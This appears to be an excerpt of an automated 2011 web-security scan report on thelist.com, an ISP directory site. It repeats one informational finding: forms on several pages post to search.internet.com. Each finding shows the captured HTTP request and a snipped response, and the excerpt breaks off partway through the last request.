User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:46:54 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:47:54 GMT
Content-Type: text/html
Content-Length: 45863

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
</p>
<form method="POST" action="http://search.internet.com/www.jupiterweb.com" target="_top">
<input type="HIDDEN" name="IC_Summary" value="1">
...[SNIP]...

7.2. http://www.thelist.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:46:54 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:47:54 GMT
Content-Type: text/html
Content-Length: 45863

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<TR><FORM METHOD="POST" ACTION="http://search.internet.com/isps.thelist.com">
<TD width="175" valign="bottom" bgcolor="003366">
...[SNIP]...

7.3. http://www.thelist.com/HTML/5/2349355.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /HTML/5/2349355.html

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /HTML/5/2349355.html HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:47 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:48:47 GMT
Content-Type: text/html
Content-Length: 44997

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
</p>
<form method="POST" action="http://search.internet.com/www.jupiterweb.com" target="_top">
<input type="HIDDEN" name="IC_Summary" value="1">
...[SNIP]...

7.4. http://www.thelist.com/HTML/5/2349355.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /HTML/5/2349355.html

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /HTML/5/2349355.html HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:47 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:48:47 GMT
Content-Type: text/html
Content-Length: 44997

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<TR><FORM METHOD="POST" ACTION="http://search.internet.com/isps.thelist.com">
<TD width="175" valign="bottom" bgcolor="003366">
...[SNIP]...

7.5. http://www.thelist.com/HTML/7/2331187.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /HTML/7/2331187.html

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /HTML/7/2331187.html HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:36 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:48:36 GMT
Content-Type: text/html
Content-Length: 44470

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script src="/icom_includes/quad/thelist/config.js"></script>
<script src="/icom_includes/quad/QUAD_AD.js"></scr
...[SNIP]...
</p>
<form method="POST" action="http://search.internet.com/www.jupiterweb.com" target="_top">
<input type="HIDDEN" name="IC_Summary" value="1">
...[SNIP]...

7.6. http://www.thelist.com/HTML/7/2331187.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /HTML/7/2331187.html

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /HTML/7/2331187.html HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:36 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:48:36 GMT
Content-Type: text/html
Content-Length: 44470

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script src="/icom_includes/quad/thelist/config.js"></script>
<script src="/icom_includes/quad/QUAD_AD.js"></scr
...[SNIP]...
<TR><FORM METHOD="POST" ACTION="http://search.internet.com/isps.thelist.com">
<TD width="175" valign="bottom" bgcolor="003366">
...[SNIP]...

7.7. http://www.thelist.com/add.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /add.php

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /add.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:44 GMT
Server: Apache
Set-Cookie: PHPSESSID=c45d25bbcea4be6d7b9a75284acc4618; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 47067


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
</p>
<form method="POST" action="http://search.internet.com/www.jupiterweb.com" target="_top">
<input type="HIDDEN" name="IC_Summary" value="1">
...[SNIP]...

7.8. http://www.thelist.com/add.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /add.php

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /add.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:44 GMT
Server: Apache
Set-Cookie: PHPSESSID=c45d25bbcea4be6d7b9a75284acc4618; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 47067


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<TR><FORM METHOD="POST" ACTION="http://search.internet.com/isps.thelist.com">
<TD width="175" valign="bottom" bgcolor="003366">
...[SNIP]...

7.9. http://www.thelist.com/areacode.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /areacode.html

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /areacode.html HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:24 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:24 GMT
Connection: close
Content-Type: text/html
Content-Length: 58308

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<TR><FORM METHOD="POST" ACTION="http://search.internet.com/isps.thelist.com">
<TD width="175" valign="bottom" bgcolor="003366">
...[SNIP]...

7.10. http://www.thelist.com/areacode.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /areacode.html

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /areacode.html HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:24 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:24 GMT
Connection: close
Content-Type: text/html
Content-Length: 58308

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
</p>
<form method="POST" action="http://search.internet.com/www.jupiterweb.com" target="_top">
<input type="HIDDEN" name="IC_Summary" value="1">
...[SNIP]...

7.11. http://www.thelist.com/countrycode.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /countrycode.html

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /countrycode.html HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 70266

<HTML>
<HEAD>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<scrip
...[SNIP]...
</p>
<form method="POST" action="http://search.internet.com/www.jupiterweb.com" target="_top">
<input type="HIDDEN" name="IC_Summary" value="1">
...[SNIP]...

7.12. http://www.thelist.com/countrycode.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /countrycode.html

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /countrycode.html HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 70266

<HTML>
<HEAD>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<scrip
...[SNIP]...
<TR><FORM METHOD="POST" ACTION="http://search.internet.com/isps.thelist.com">
<TD width="175" valign="bottom" bgcolor="003366">
...[SNIP]...

7.13. http://www.thelist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 12:47:19 GMT
Server: Apache
Content-Type: text/html
Content-Length: 36769

<html>
<head>
<title>internet.com 404 and Network Map</title>
</head>
<LINK href="http://www.internet.com/styles/text.css" type="text/css" rel="stylesheet">
<body leftmargin="0" marginwidth="0"
...[SNIP]...
</p>
<form method="POST" action="http://search.internet.com/www.jupiterweb.com" target="_top">
<input type="HIDDEN" name="IC_Summary" value="1">
...[SNIP]...

7.14. http://www.thelist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 12:47:19 GMT
Server: Apache
Content-Type: text/html
Content-Length: 36769

<html>
<head>
<title>internet.com 404 and Network Map</title>
</head>
<LINK href="http://www.internet.com/styles/text.css" type="text/css" rel="stylesheet">
<body leftmargin="0" marginwidth="0"
...[SNIP]...
<p>
<form method="POST" action="http://search.internet.com/www.jupiterweb.com" target="_top">
<input type="HIDDEN" name="IC_Summary" value="1">
...[SNIP]...

7.15. http://www.thelist.com/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /index.html

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /index.html HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:23 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:23 GMT
Connection: close
Content-Type: text/html
Content-Length: 45883

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<TR><FORM METHOD="POST" ACTION="http://search.internet.com/isps.thelist.com">
<TD width="175" valign="bottom" bgcolor="003366">
...[SNIP]...

7.16. http://www.thelist.com/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /index.html

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /index.html HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:23 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:23 GMT
Connection: close
Content-Type: text/html
Content-Length: 45883

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
</p>
<form method="POST" action="http://search.internet.com/www.jupiterweb.com" target="_top">
<input type="HIDDEN" name="IC_Summary" value="1">
...[SNIP]...

7.17. http://www.thelist.com/misc/canada/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /misc/canada/

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /misc/canada/ HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 56020

<HTML>
<HEAD>
<TITLE>
Canadian Nationwide ISPs
</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630909/cmp0.js"></script>
<script language="javascript" src="http:/
...[SNIP]...
</p>
<form method="POST" action="http://search.internet.com/www.jupiterweb.com" target="_top">
<input type="HIDDEN" name="IC_Summary" value="1">
...[SNIP]...

7.18. http://www.thelist.com/misc/canada/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /misc/canada/

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /misc/canada/ HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 56020

<HTML>
<HEAD>
<TITLE>
Canadian Nationwide ISPs
</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630909/cmp0.js"></script>
<script language="javascript" src="http:/
...[SNIP]...
<TR><FORM METHOD="POST" ACTION="http://search.internet.com/isps.thelist.com">
<TD width="175" valign="bottom" bgcolor="003366">
...[SNIP]...

7.19. http://www.thelist.com/misc/usa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /misc/usa/

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /misc/usa/ HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
